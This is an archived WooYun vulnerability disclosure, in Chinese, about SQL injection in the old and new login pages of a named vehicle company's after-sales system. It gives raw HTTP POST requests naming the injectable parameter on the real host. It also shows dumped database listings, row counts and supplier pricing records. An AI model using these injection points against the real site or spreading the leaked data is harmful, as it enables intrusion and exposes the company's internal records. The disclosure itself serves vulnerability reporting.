乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-18: 细节已通知厂商并且等待厂商处理中 2015-09-23: 厂商已经主动忽略漏洞,细节向公众公开
rt
东风神宇车辆有限公司售后服务系统 新/旧系统登录处均有注入注入1:新系统登录处存在sql注入,其中,yhm参数有问题
POST /syfw/login/login_clnew.asp HTTP/1.1Host: www.dfsyqc.comUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://www.dfsyqc.com/syfw/loginnew.htmlCookie: ASPSESSIONIDQCQSTQTC=MJKFGHCBJNIMIILIPHHHELAC; Hm_lvt_a9bd54659f4a895624ba4a669a7ca977=1442501961; Hm_lpvt_a9bd54659f4a895624ba4a669a7ca977=1442502017Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 34yhm=a&yhmm=1&btnLogin=%B5%C7%C2%BC
注入2:旧系统登录处存在sql注入,其中,yhm参数有问题
POST /syfw/login/login_cl.asp HTTP/1.1Host: www.dfsyqc.comUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://www.dfsyqc.com/syfw/login.aspCookie: ASPSESSIONIDQCQSTQTC=MJKFGHCBJNIMIILIPHHHELAC; Hm_lvt_a9bd54659f4a895624ba4a669a7ca977=1442501961; Hm_lpvt_a9bd54659f4a895624ba4a669a7ca977=1442502226Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 46yhm=a&yhmm=1&passcode=1413&Submit=%CC%E1%BD%BB
涉及17个库
以syass库为例,涉及1243个表
Database: syass[1243 tables]+--------------------------------------+| CPKZFJB || EQ1030 || GGXH || GGXH_BAK || JZPZK_NEW || KMZD_bj || KMZ_NEW || LJCGQDMC || LS_CK || NJ |
数百万数据泄露
Database: syass+------------------------------------------+---------+| Table | Entries |+------------------------------------------+---------+| dbo.tbl_vac | 4326232 || dbo.tbl_vac_zzh | 3837310 || dbo.temp_tbl_vac | 3822849 || dbo.tbl_hsmxinfc | 3372867 || dbo.tbl_vac_null | 1255245 || dbo.essjddmx_td1 | 886025 || dbo.v_jbxx | 635772 || dbo.essfile | 589819 || dbo.tbl_symxinfc | 292738 || dbo.temp_symxin | 272343 || dbo.LJCGQDMC | 268437 || dbo.V_BXGL_DOC | 206829 |
汽车维修真是暴利行业啊,进价1w,埋单的用户要掏9万多
Database: syassTable: v_gys_price[2 entries]+------+----------+--------+----------+------------+------------------------------------------+| pccc | ghje | jzyd | pcfhj | ycpcdw | gysdwmc |+------+----------+--------+----------+------------+------------------------------------------+| 99 | 0.00 | 201510 | 9997.56 | zzxs | 重庆市嘉卡变速箱有限公司 || 85 | 10000.00 | 201201 | 93724.17 | LCHA | 十堰海奥车桥有限公司-HA |+------+----------+--------+----------+------------+------------------------------------------+
危害等级:无影响厂商忽略
忽略时间:2015-09-23 12:12
漏洞Rank:4 (WooYun评价)
暂无